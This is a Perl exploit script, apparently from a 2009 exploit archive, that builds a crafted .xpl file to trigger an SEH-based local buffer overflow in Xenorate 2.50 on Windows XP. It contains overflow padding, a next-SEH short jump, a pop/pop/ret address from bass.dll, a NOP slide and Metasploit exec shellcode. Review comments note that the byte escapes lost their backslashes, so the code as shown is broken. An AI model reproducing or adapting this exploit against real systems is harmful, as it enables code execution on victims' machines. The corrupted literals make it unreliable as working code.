
# Title : Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)
# Published : 2009-12-10
# Author : germaya_x


#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
 Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)
==============================================================================
	[a] Exploited by:.......[       germaya_x       ].....................
        [a] Script:.............[       Xenorate        ].....................
        [a] version:............[        2.5.0.0        ]..................... 
	[a] Today:..............[       05/10/2009      ].....................
        [a] platform............[        Windows        ].....................
        [a] tested on:..........[     Windows XP SP2    ].....................
        [a] greetz:.............[  his0k4/D3v!LFUCK3R   ].....................
==============================================================================


	
=cut
##############################################################################
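use strict;
use warnings;

# Overflow layout written to the .xpl file, in order: 88 bytes of padding, the
# SEH record (next-SEH pointer, then handler address), a NOP slide, and the
# payload.  Sizes and byte values are the author's; nothing here is derived.
#
# NOTE(review): every string literal below reads "x41", "xEB", ... rather than
# "\x41", "\xEB" — the backslashes appear to have been stripped when this
# listing was extracted.  As written the script emits plain ASCII text, not the
# bytes the comments describe.  The literals are preserved exactly as they
# appear on the page rather than guessed at.
my $bof      = "x41" x 88;
my $next_seh = "xEBx06x90x90";   # short jmp
my $SEH      = "xFDxA4x00x10";   # p/p/r--->bass.dll
my $nop      = "x90" x 20;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

###################################################################
# Output file name is the author's; it is opened in append mode, so repeated
# runs keep growing the same file (unchanged from the original behaviour).
my $out_file = 'germaya_x.xpl';

# Three-argument open with a lexical handle: the original two-argument form
# parsed the mode out of the filename string and never checked for failure,
# so a silently failed open produced no file and no diagnostic.
open my $fh, '>>', $out_file or die "open $out_file: $!";
print {$fh} $bof . $next_seh . $SEH . $nop . $Shcode;
# Buffered write errors only surface at close, so check that as well.
close $fh or die "close $out_file: $!";
###################################################################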